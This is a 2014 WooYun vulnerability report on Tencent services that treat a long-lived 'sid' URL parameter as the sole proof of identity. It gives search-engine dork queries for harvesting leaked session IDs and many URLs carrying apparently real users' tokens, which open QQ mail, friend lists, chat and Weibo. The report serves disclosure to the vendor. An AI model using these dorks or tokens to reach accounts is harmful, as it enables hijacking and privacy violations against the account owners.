当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081109

漏洞标题:腾讯某业务逻辑控制不严可导致用户在不知情的情况下账号被盗(影响聊天、空间、微博、邮箱等全线业务)

相关厂商:腾讯

漏洞作者: 临时工

提交时间:2014-10-28 18:41

修复时间:2014-12-12 18:42

公开时间:2014-12-12 18:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-28: 细节已通知厂商并且等待厂商处理中
2014-10-29: 厂商已经确认,细节仅向厂商公开
2014-11-08: 细节向核心白帽子及相关领域专家公开
2014-11-18: 细节向普通白帽子公开
2014-11-28: 细节向实习白帽子公开
2014-12-12: 细节向公众公开

简要描述:

有N多成功实例可证明危害性

详细说明:

1.问题起因,sid这个参数,腾讯很多业务都使用sid单个参数做用户识别,然后还都是get请求,这种模式对于现在的网络安全环境来说,有点2了,而且请求过程也都是非加密的,抓取到通信即可获取,sid的有效期我发现也特别长,即使同一QQ生成多组sid也均会有效,那么下面问题来了?
举个例子:(例子来自于搜索引擎抓取到的sid,无需密码即可使用全线业务,真变态,原来还真不知道)
site:vip.qq.com inurl:sid=

b1.jpg


site:qq.com inurl:card/index inurl:sid=
site:mc.vip.qq.com inurl:sid=

a1.jpg


a2.jpg


site:qq.com inurl:sid=A

c.jpg


还有很多搜索方法,搜索引擎很给力吖
有效的sid是24位,都是A开头的,可以从搜索引擎里找到相当一部分有效的。
而且搜索引擎抓取的时间都是几个月前,那也就是说sid的有效时间很长,
但是有个情况,就是我带着搜索到的sid访问一些业务之后,突然会失效,
但是隔了几天或者很长时间,sid又有效了,很奇怪,不然早提交上来了,等着sid都有效。

漏洞证明:

2.qq业务列表:(下面的sid均来自搜索引擎,当你测试的时候不见的都有效)
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0

1.jpg


http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=ASgc4S73J9ioV2max7BYk_jq
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AVlYOq9Gr9WXTQx-o0BCH_4e
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AVbMZcf6i0b6L7udTckv3-gE
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AfstupcmnyfABb-D0gSjTK9r
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AUUvPjFYfHvhFs0UFc88gbCq
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=ARK7Ydu40t21Ytd7wHKvcpiH
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AVApzk2ozFT9naJlAaTY1BGl
http://qbar.3g.qq.com/g/qbar/qbar_list.jsp?sid=AWR_cLCYmi2TBN6jpxry44pc
......
qq空间:
http://ish.z.qq.com/infocenter_v2.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0

2.jpg


qq微博:可以强加关注了
http://tapp.3g.qq.com/g/s?g_f=4719&g_ut=2&aid=h&sid=AcaYiNOTAAwj-34Gt1wL8Jc0&coid=qzone

2.1.jpg


qq邮箱:尼玛吖,从来不知道还有这个邮箱入口
http://w.mail.qq.com/cgi-bin/today?sid=jOjed82ocilmASF1XcHT5vNw,4,zQEJ7KD-F&first=1&sid=AcaYiNOTAAwj-34Gt1wL8Jc0

3.jpg


qq家园触屏版:可以和好友聊天了
http://house60.3g.qq.com/touch/index.jsp?sid=AcaYiNOTAAwj-34Gt1wL8Jc0#house/friends/all

4.jpg


qq好友、群列表:上面触屏版好友不全,可这里面就多了,qq号在源码里
http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AcaYiNOTAAwj-34Gt1wL8Jc0#house/friends/all

5.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=ASgc4S73J9ioV2max7BYk_jq

6.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AcaYiNOTAAwj-34Gt1wL8Jc0

7.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AVlYOq9Gr9WXTQx-o0BCH_4e

8.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AVbMZcf6i0b6L7udTckv3-gE

9.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AfstupcmnyfABb-D0gSjTK9r

10.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AUUvPjFYfHvhFs0UFc88gbCq

11.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=ARK7Ydu40t21Ytd7wHKvcpiH

12.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AVApzk2ozFT9naJlAaTY1BGl

13.jpg


http://openmobile.qq.com/oauth2.0/m_jump?page=shareindex.html&sid=AWR_cLCYmi2TBN6jpxry44pc
......还有很多其他业务,我想QQ主人自己都不知道账号已失窃

修复方案:

肯定懂得修复,就看你们想怎么处理了

版权声明:转载请注明来源 临时工@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-10-29 16:16

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无